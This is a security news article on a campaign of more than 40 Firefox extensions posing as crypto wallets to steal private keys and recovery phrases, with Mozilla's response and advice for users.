Researchers at Koi Security have uncovered a large-scale campaign within the Firefox Add-ons Store: more than 40 extensions impersonating well-known wallets (MetaMask, Coinbase, Trust Wallet, Phantom, Exodus, OKX, etc.) have been identified. Active since at least April 2025, some were uploaded as recently as last week.

Impersonation Methods and Data Collection

Disguise: The extensions use the official names and logos of popular wallets to mask their malicious nature.

Cloning: The majority are clones of open-source solutions. The legitimate code is reproduced, and malicious logic is then inserted to extract private keys and mnemonic phrases and transmit them to a remote server.

Input Interception: Some scripts intercept input fields as soon as the user enters more than 30 characters—typically the length of a real private key or recovery phrase.

Social Engineering: The extensions display a large number of fake 5-star reviews to deceive the user regarding their popularity and legitimacy.

Attacker Profile

Analysis of the source code and metadata reveals indications pointing toward a Russian-speaking group.

Mozilla's Response

Removal: Almost all of these extensions (with the exception of MyMonero Wallet at the time of reporting) have been removed from the store.

Prevention: Mozilla has also stated that they have implemented an early detection system to block malicious crypto wallet extensions as soon as they are identified.

Recommendations for Users

Verify Authors: Only install extensions from verified authors, and avoid VSIX versions or unofficial sources.

Check Statistics: Verify download statistics and reviews. An abnormal gap between the number of installations and the number of glowing reviews is highly suspicious.

Immediate Action: If you have already installed a wallet extension, delete it immediately and monitor your accounts for any unusual activity.

Use Trusted Tools: Prioritize transparent, open-source solutions, such as uBlock Origin, to limit exposure risks.

General Context

This malicious wave is part of a rising trend of threats regarding browser extensions. Firefox, with its flexible APIs, facilitates the injection of malicious behaviors. This mirrors broader industry issues, as demonstrated by a recent study indicating that a third of malicious extensions detected on Chrome were still active despite regular checks.

Key Takeaways

Impact: Crypto-assets are stolen directly via the browser; the theft is irreversible and often invisible to the user until it is too late.

Exploited Flexibility: Firefox APIs allow this manipulation because they are sometimes more permissive than Chrome's.

Necessity: Increased vigilance is required when adding extensions, along with regular checks and the strict use of reliable sources.